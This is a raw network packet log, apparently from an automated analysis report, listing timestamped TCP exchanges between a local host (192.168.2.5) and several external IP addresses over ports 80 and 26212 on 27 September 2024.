Sep 27, 2024 04:21:17.181303978 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.181307077 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.181318998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.181334019 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.181350946 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.186233997 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:17.186954975 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.186968088 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.186979055 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.186997890 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.187015057 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.187016010 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.187027931 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.187040091 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.187048912 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.187053919 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.187078953 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.187108994 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.191420078 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:17.206635952 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206653118 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206664085 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206693888 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.206713915 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.206713915 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206732988 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206743956 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206751108 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.206758022 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206769943 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206777096 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.206780910 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206794024 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206803083 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.206804991 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206820011 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.206823111 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206840038 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206845045 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.206851959 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206862926 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206871986 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.206873894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206886053 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206887960 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.206903934 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206913948 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.206921101 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206933975 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206938982 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.206944942 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206954956 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.206957102 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206969023 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.206976891 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.207003117 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.207021952 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.207034111 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.207043886 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.207053900 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.207079887 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.207096100 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.207112074 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.207128048 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.207151890 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.207159996 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.207170963 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.207180023 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.207192898 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.207210064 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.212589025 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.212621927 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.212632895 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.212646961 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.212670088 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.212671041 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.212682009 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.212692976 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.212703943 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.212704897 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.212716103 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.212729931 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.212754965 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.212755919 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.212765932 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.212788105 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.212789059 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.212800980 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.212809086 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.212821960 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.212836981 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.212874889 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.212887049 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.212902069 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.212907076 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.212914944 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.212924957 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.212928057 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.212940931 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.212958097 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.213924885 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.213936090 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.213948011 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.213962078 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.213989019 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.213996887 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.214008093 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.214019060 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.214030027 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.214035034 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.214059114 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.214082003 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.214102030 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.214112997 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.214122057 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.214140892 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.214167118 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.214196920 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.214209080 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.214220047 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.214230061 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.214231968 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.214243889 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.214255095 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.214288950 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.214903116 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.214921951 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.214931965 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.214941978 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.214955091 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.214970112 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.215010881 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.215023041 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.215033054 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.215045929 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.215045929 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.215061903 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.215066910 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.215080023 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.215106010 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216114044 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216156960 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216170073 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216180086 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216206074 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216228962 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216237068 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216248035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216258049 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216270924 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216274023 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216288090 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216311932 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216340065 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216351032 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216362000 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216373920 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216391087 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216393948 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216407061 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216428041 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216438055 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216449022 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216450930 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216470003 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216485977 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216492891 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216504097 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216525078 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216541052 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216619968 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216631889 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216655016 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216670036 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216738939 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216748953 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216758966 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216769934 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216773033 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216785908 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216788054 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216795921 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216804981 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216814995 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216826916 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216834068 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216837883 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216861963 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216883898 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216893911 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216906071 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216917038 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216928005 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216929913 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216939926 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.216948032 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.216979027 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.217032909 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.217044115 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.217055082 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.217066050 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.217077017 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.217078924 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.217092991 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.217099905 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.217113018 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.217140913 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.217161894 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.217175007 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.217185974 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.217202902 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.217215061 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.220436096 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.220463037 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.220474005 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.220484972 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.220504999 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.220524073 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.220535994 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.220546961 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.220558882 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.220585108 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.220643044 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.220654011 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.220664024 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.220674038 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.220679998 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.220688105 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.220700026 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.220726013 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.220745087 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.220756054 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.220767021 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.220776081 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.220779896 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.220808029 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.227546930 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.227571964 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.227581978 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.227622032 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.227647066 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.227659941 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.227662086 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.227678061 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.227679968 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.227690935 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.227703094 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.227704048 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.227724075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.227746010 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.229166031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.229176998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.229187012 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.229218006 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.229222059 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.229229927 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.229237080 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.229242086 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.229249954 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.229254007 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.229264975 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.229266882 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.229285955 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.229317904 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.247792006 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.247817039 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.247829914 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.247840881 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.247853994 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.247864962 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.247865915 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.247876883 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.247889996 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.247890949 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.247905016 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.247929096 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.247945070 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.247951031 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.247962952 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.247976065 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.247986078 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.248002052 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.248018980 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.248054028 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.248069048 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.248090029 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.248105049 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.254261017 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.254297972 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.254308939 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.254328012 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.254332066 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.254339933 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.254352093 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.254391909 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.254391909 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.254703045 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.254713058 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.254774094 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.254791975 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.254817009 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.254828930 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.254852057 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.254852057 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.254940033 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.254951000 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.254961967 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.254971981 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.254971981 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.254978895 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.254992962 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.255018950 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.255018950 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.255389929 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.255877018 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.255889893 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.255901098 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.255912066 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.255923986 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.255934954 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.255947113 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.255955935 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.255955935 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.255959988 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.255999088 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.255999088 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.256778002 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.256788969 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.256798983 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.256845951 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.256850004 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.256856918 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.256866932 CEST	80	49722	185.215.113.17	192.168.2.5
